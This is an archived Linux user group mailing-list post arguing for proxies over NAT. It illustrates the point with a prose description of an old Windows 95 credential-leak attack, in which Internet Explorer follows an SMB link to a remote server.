VanLUG Email Archive
> You _NEVER_ want to do a 'site-wide' anything... _ALWAYS_ specify each host,
> and what it is allowed to do...
That's a good attitude, but it inevitably leads to using proxies
rather than NAT. :-)
Here's an example of a classic attack from a couple of years ago
that worked through NAT, but not through proxies. Windows 95 user
running IExplorer accesses a web page. After downloading it,
IExplorer looks at the links to the images and starts loading them.
However, one link is not an http link but an SMB link. IExplorer
says, `No problem, I'm Windows; I know how to do that!' and opens
up an SMB connection to the given server. However, the SMB server
rejects the first connection, saying `You need a password for that.'
At this point IExplorer digs around for a password, and finds the
one that the user used to log on to the local NT file server. It
merrily sends that off, the remote SMB server logs it and sends
back the image. The attacker now has a valid username and password
for that NT server.
When you're using proxies this won't work, unless you specifically
proxy SMB (which you wouldn't, normally).
If you need something more than proxies can do for you, the next
step would be to use NAT with heavy filtering or socks with heavy
restrictions or something like that.
cjs
-- Curt Sampson <
> 604-257-9400 De gustibus, aut bene aut nihil. Any opinions expressed are mine and mine alone. The most widely ported operating system in the world: http://www.netbsd.org